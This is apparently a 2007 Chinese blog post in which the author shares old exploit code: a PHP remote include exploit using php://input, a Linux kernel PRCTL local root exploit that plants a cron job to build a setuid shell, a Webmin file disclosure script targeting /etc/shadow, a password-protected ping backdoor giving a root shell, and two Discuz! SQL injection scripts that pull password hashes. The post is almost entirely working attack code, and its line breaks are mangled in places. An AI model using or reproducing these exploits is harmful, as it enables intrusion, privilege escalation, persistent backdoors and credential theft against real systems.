小东西

Published on 2007 - 05 - 22

翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意

Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:

<?php
/*

PHP include file exploit
* Modified by wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
* Date: Jun 24th 2006

/

function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}

if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}

$server=isset($_POST['server'])?$_POST['server']:"";
$file=isset($_POST['file'])?$_POST['file']:"";
$iszero=isset($_POST['iszero'])?"checked":"";
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";
?>

<style>
body {font
-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
font
-family: "Verdana";
font
-size: "10px";
BACKGROUND
-COLOR: "#FFFFFF";
height
: "18px";
border
: "2px solid #666666";
}
</style>

<center><b>PHP include file exploit</b><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0</font></center><br><br>
<form action="" method="post" >
target server
: <br>
<input type="text" name="server" value="<?=$server?>"><br><br>
target
file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value="<?=$file?>"><br>
add
"%00": <input type="checkbox" <?=$iszero?> name="iszero"><br><br>
exec (enclose php commands between &lt;? .. ?&gt; tags):<br>
<input type="text" name="cmd" value="<?= htmlspecialchars($cmd);?>" ><br><br>
<INPUT type="submit" value="send">
</form>

<?php
if(isset($_POST['cmd']))
{
$zerochar = $iszero == "checked"?"%00":"";
$message = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while(!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
echo $resp;
}
?>



这个是当时linux kernel PRCTL loacl poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)

/*****************************************************/
/
Local r00t Exploit for: /
/
Linux Kernel PRCTL Core Dump Handling /
/
Modified by wofeiwo 13.Jul.2006 /
/
------------------------------------------------------/
/
Based on: /
/
------------------------------------------------------/
/
By: /
/
- dreyer <luna@aditel.org> (main PoC code) /
/
- RoMaNSoFt <roman@rs-labs.com> (local root code) /
/
[ 10.Jul.2006 ] /
/
****************************************************/

#include <stdio.h>
#
include <sys/time.h>
#
include <sys/resource.h>
#
include <unistd.h>
#
include <linux/prctl.h>
#
include <stdlib.h>
#
include <sys/types.h>
#
include <signal.h>

char
payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root echo -e </span>"#include <stdio.h>\nint main(){\nsetuid(0);setgid(0);setreuid(0);system(\"/bin/sh\");return 0;\n}\n" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("Last modified By: wofeiwo (chage shellcode)\n");
printf("Last edited: [ 13.Jul.2006 ]\n\n");

corelimit
.rlim_cur = RLIM_INFINITY;
corelimit
.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE
, &corelimit);

printf("[*] Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE
, 2);
sleep(200);
exit(1);
}

kill(child
, SIGSEGV);

printf("[*] Sleeping for aprox. one minute ( please wait )\n");
sleep(63);

printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
system("/tmp/fakesh");
return 0;
}


python写的,去年webmin 一个高危漏洞的exp

#!/usr/bin/python
#
Webmin - Usermin Arbitrary File Disclosure Exploit
#
Write by wofeiwo
#
Date: July 10 2006

import sys, urllib, os

def usage (name):
print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo <wofeiwo[0x40]gmail[dot]com>\n\nUsage: %s <target> <file>\nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)

def main ():
if len(sys.argv) != 3:
(filepath, filename)
= os.path.split(sys.argv[0])
usage(filename)
sys.exit(
-1)
else:
target
= sys.argv[1] + "unauthenticated" + "/..%01"61 + "/" + sys.argv[2]
sock
= urllib.urlopen(target)
getfile
= sock.read()
sock.close()
print getfile

if __name__ == "__main__": main()


n年前写的替换系统ping的后门,因为ping是有s位的:)

#include <stdio.h>
#
include <unistd.h>
#
include <signal.h>
#
include <sys/param.h>
#
include <sys/types.h>
#
include <sys/stat.h>
#
include <unistd.h>
#
include <fcntl.h>
#
include <errno.h>

#define PWD "wofeiwo"

/
init the daemon, if success return 0 other <0 /
int daemon_init()
{
struct sigaction act;
int i
, maxfd;

if(fork() != 0) exit(0);
if(setsid() < 0) return(-1);

act
.sa_handler = SIG_IGN;
/
act.sa_mask = 0;/
act
.sa_flags = 0;

sigaction(SIGHUP
, &act, 0);

if(fork() != 0) exit(0);

chdir("/");
umask(0);
maxfd
= sysconf(_SC_OPEN_MAX);
for(i=0; i<maxfd; i++)
close(i);
open(
"/dev/null", O_RDWR);
dup(
0);
dup(
1);
dup(
2);
return(0);
}

int main(int argc
, char
argv[])
{
int i
,j=0;
char argv_execv[
52][128];
char usage[]
=
"Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
" [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
" [-M mtu discovery hint] [-S sndbuf]\n"
" [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";

if (argc == 1) printf("%s", usage);
if (argc > 1)
{
if (strcmp(PWD, argv[1]) == 0)
{
signal(SIGCHLD
, sig_chid);
daemon_init();
seteuid(
0);
setuid(
0);
setgid(
0);
system("/bin/bash");
return 1;
}
else
{
for (i = argc; i > 0; i--)
{
strcpy(argv_execv[j]
,argv[j]);
j
++;
}
strcpy(argv_execv[j]
, "\0");
execv(
"/bin/ping", argv);
return 1;
}
}
return 0;
}



最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的

/*

Discuz! 5.0.0 RC1 SQL injection PoC
* Author: wofeiwo thx superheis help
* Date: Aug 24th 2006

/

#include <stdio.h>
#
include <stdlib.h>
#
include <winsock2.h>
#
include <windows.h>

#pragma comment (lib,"ws2_32")

#define PASSLEN 32


char
HMod[] = { "GET","POST"};
char
HttpVer[] = { "HTTP/1.0", "HTTP/1.1"};
char
*HAccept[] = { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /"};
char
HAcceptLg[] = { "Accept-Language:"," zh-cn"};
char
HContentTp[]= { "Content-Type:"," application/x-www-form-urlencoded"};
char
HAcceptEn[] = { "Accept-Encoding:"," gzip, deflate"};
char
HUserAgent[]= { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char
HReferer[]= { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char
HHost[]= { "Host: "};
char
HContentLg[]= { "Content-Length:"," 189"};
char
HContion[]= { "Connection:"," Keep-Alive"};
char
HCacheCtr[]= { "Cache-Control:"," no-cache"};
char
HXForwardedFor[]= { "X-Forwarded-For:"};
char
HCookie[]= { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char
HPost[]= { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };

char query[]
= " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[
128];

char temp1[
1024],temp2[10240] = {0};


int sanddata(char
host, int port, char path, char uid, int ascii, int chrnum)
{
WSADATA WSAData
={0};
struct hostent
he;
struct sockaddr_in ServerAddr
={0};
SOCKET Socket
=0;
int ren
= 0;
char
p = NULL;

if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;

if((he = gethostbyname(host)) == 0)
{
fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
exit(-1);
}

Socket
= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);


ServerAddr
.sin_family = AF_INET;
ServerAddr
.sin_addr =
((struct in_addr )he->h_addr);
ServerAddr
.sin_port = htons(port);

memset(temp1
,0,1024);
sprintf(querystring, query, uid, chrnum, ascii);
sprintf(temp1, "%s %s%s %s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"\r\n"
"%s\r\n"
"\r\n\r\n"
,
HMod[
1],path,"logging.php?action=login",HttpVer[1],
HAccept[
0],HAccept[1],
HAcceptLg[
0],HAcceptLg[1],
HContentTp[
0],HContentTp[1],
HAcceptEn[
0],HAcceptEn[1],
HUserAgent[
0],HUserAgent[1],
HReferer[
0],HReferer[1],
HHost[
0],host,
HContentLg[
0]," 0",
HContion[
0],HContion[1],
HCacheCtr[
0],HCacheCtr[1],
HXForwardedFor[
0],querystring,
HCookie[
0],HCookie[1],
HPost[
0]
);
if (chrnum == 1) printf("\r\n%s\r\n",temp1);

connect(Socket
,(SOCKADDR
)&ServerAddr,sizeof(ServerAddr));

send(Socket
,temp1,strlen(temp1),0);
//sleep(1);
while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}

if (chrnum == 1) printf("\r\n%s\r\n",temp2);
if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
{
fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
exit(1);
}
if((p = strstr(temp2, "ip3")) == NULL)
{
close(Socket);
return ascii;
}

close(Socket);
return 0;
}

int main(int argc
,char argv[])
{
int i
= 0,j = 0,ret = 0;

fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");

if(argc != 5)
{
fprintf(stderr, "Usage: %s <host> <port> <path> <uid>\r\n", argv[0]);
fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
exit(1);
}

fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
fprintf(stdout, "[+] Trying ..\r\n");
fprintf(stdout, "[+] Plz wait a monment ..\r\n");
fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);

for(j = 1; j <= PASSLEN; j++)
{
for(i = 48; i < 58; i++)
{
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
else
{
fprintf(stdout, "%c", ret);
goto finded;
}
}
for(i = 98; i < 123; i++)
{
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
else
{
fprintf(stdout, "%c", ret);
goto finded;
}
}
finded
: ret = 0;
}

fprintf(stdout, "\r\n");
fprintf(stdout, "[+] Finished\r\n");

return 0;
}



#!/usr/bin/python
#
Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
#
Author: wofeiwo
#
Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

password
= {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}

class creatthread (threading.Thread):
def __init__ (self, threadname, url, u):
self.realurl
= url
self.realu
= u
threading.Thread.
__init__(self, name = threadname)

def run (self):
lenth
= 32
injection(lenth, self.realurl, self.realu, self.getName())

def injection (lenthofpass, realurl, path, num):

ran
= range(97, 123)
for a in range(48, 58): ran.append(a)

for i in ran:

query
= '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /
'
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
data
= "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request(
"POST", path + "logging.php?action=login&",data , header)
sleep(
1)
response
= http.getresponse()
re1
= response.read()
if re1.find('SELECT') == -1:
print '[-] Unvalnerable host'
print '[-] Exit..'
sys.exit(
1);

elif re1.find('ip3') == -1:
password[int(num)]
= chr(i)
#print '[+] password ' + num + ': ' + chr(i)
http.close()
sleep(
1)
break
#print re1
#print '-----------------------------------------------'
http.close()
sleep(
1)

def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

if len(sys.argv) == 3:
url
= urlparse(sys.argv[1])
if url[2:-1] != '/':
u
= url[2] + '/'
else:
u
= url[2]
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)

print '[+] Connect %s' % url[1]
print '[+] Begin threads'
print '[+] Plz wait a long long time'

for a in range(1,33) :
thread
= creatthread(str(a), url, u)
thread.start()

while threading.activeCount() != 1:
continue
else:
sys.stdout.write(
'[+] The uid=' + sys.argv[2] + ' password hash is: ' )
for n in range(1, 33) :
sys.stdout.write(password[n])
sys.stdout.write(
'\n[+] Finished \n')


if __name__ == '__main__': main()

Comments
Write a Comment